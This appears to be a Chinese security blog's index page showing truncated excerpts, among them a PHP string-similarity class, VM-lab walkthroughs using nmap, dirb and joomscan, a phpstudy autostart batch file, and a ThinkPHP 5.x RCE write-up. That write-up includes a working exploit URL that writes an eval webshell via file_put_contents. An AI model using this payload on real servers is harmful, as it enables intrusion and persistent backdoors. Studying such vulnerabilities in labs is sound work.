2020-3-30 myluzh
PHP
可以计算两个字符串之间最长公共子序列或者相似度,但是比较吃内存。
<?php
class LCS {
var $str1;
var $str2;
var $c = array();
/*返回串一和串二的最长公共子序列
*/
function getLCS($str1, $str2, $len1 = 0, $len2 = 0) {
$this->str1 = $str1;
$this->str2 = $str2;
if ($len1 == 0) $len1 = strlen($str1);
if ($len2 == 0) $len2 = strlen($str2);
$this->initC($len1, $len2);
return $this->printLCS($this->c, $len1 - 1, $len2 - 1);
}
/*返回两个串的相似度
*/
function getSimil...
阅读全文>>
标签: php 算法
评论(0)
(873)
2020-3-25 myluzh
PHP
0x01影响版本:
ThinkPHP v5.0系列<5.0.23
ThinkPHP v5.1系列<5.1.31
0x02漏洞分析:
关键代码:
// 获取控制器名
$controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));
该漏洞形成的原因是ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤,在没有开启强制路由的情况下,攻击者可以通过输入‘\’字符的方式调用任意方法,从而实现远程代码执行。
0x03入侵利用
1. 写入 Shell
http//localhost/thinkphp-5.1.29/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_REQUEST[...
阅读全文>>
标签: 渗透 php 漏洞 ThinkPHP 远程命令执行
评论(0)
(1484)
2020-3-23 myluzh
SECURE
0x01初步探测
靶机导入虚拟机后,利用命令 nmap -sP 192.168.1.1/24 或者 netdiscover找到靶机,ip为192.168.1.106,nmap扫描后,只开了一个80端口。
0x02 修改host
根据官方说明,需要为主机添加一条host记录,把你的 靶机ip 指向 DC-2 ,否则无法访问到靶机的CMS。
###靶机官方说明:
Please note that you will need to set the hosts file on your pentesting device to something like:
192.168.0.145 dc-2
Obviously, replace 192.168.0.145 with the actual IP address of DC-2.
It will make life a whole lot simpler (and a certain CMS may not work without it).
###Linux 修改host:
vi /etc/hosts
###Windows 修改host:
...
阅读全文>>
标签: 靶机
评论(0)
(1067)
2020-3-21 myluzh
PHP
在Window的文件资源管理器地址输入StartUp文件夹地址,
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp或
%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
加入一个bat文件,内容如下,记得改下面phpstudy地址,这边是D:\phpstudy_pro\:
%1 %2
ver|find "5.">nul&&goto :Admin
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :Admin","","runas",1)(window.close)&goto :eof
:Admin
D:\phpstudy_pro\Extensions\MySQL5.7.26\bin\mysqld --install
D:\phpstudy_pro\Extensions\Apache2.4.39\bin\httpd.exe -k insta...
阅读全文>>
标签: phpstudy_pro windows 自启
评论(0)
(903)
2020-3-19 myluzh
SECURE
0x01 初步探测
靶机导入虚拟机后,kali下使用netdiscover找到靶机ip,这里靶机ip为192.168.1.103。nmap扫了下端口,只有80端口跟22端口开着,那就先从80端口访问网站试试看吧。
打开网站后提示 Show me your SQLI skills,应该是让我们sql注入,手动测试了下无果,sqlmap测试也无果,打算再看看。
0x02信息收集
dirb扫了下网站目录,找到了一些能用的地址
phpmhadmin路径 http://192.168.1.103/phpmy
图片上传点 http://192.168.1.103/add #只是一个空壳,没有上传的功能
phpinfo信息 http://192.168.1.103/in
这个页面好像能文件包含 http://192.168.1.103/test
还扫到了一些地址是空白页面,暂时不知道是干嘛的,
http://192.168.1.103/c.php
http://192.168.1.103/show
http://192.168.1.103...
阅读全文>>
评论(0)
(945)
2020-3-17 myluzh
SECURE
0x01 初步探测
靶机导入虚拟机后,先找到靶机IP,Kali下使用 netdiscover 或者 nmap -sP 192.168.1.1/24 命令即可。扫到靶机IP为192.168.56.100
继续使用nmap扫描一下靶机开放的端口
0x02后台查找
网站80端口开着,那就先从网站下手,直接访问http://192.168.1.100/,发现只是一个单纯的Bootstrap框架页面,没有任何有用的信息。
继续使用dirb扫了下网站目录,发现了一个joomla地址, DIRECTORY: http://192.168.1.100/joomla/
访问该地址,是一个名叫TIM的博客
使用JoomScan工具,能对Joomla项目进行漏洞扫描,看看有没有什么收获。
git clone https://github.com/rezasp/joomscan.git#安装
cd joomscan#打开
perl joomscan.pl -u http://192.168.1.100/#扫描
通过JoomScan扫描,找到了一个可用地址
打开是后台登录界面,试...
阅读全文>>
标签: 靶机
评论(0)
(1430)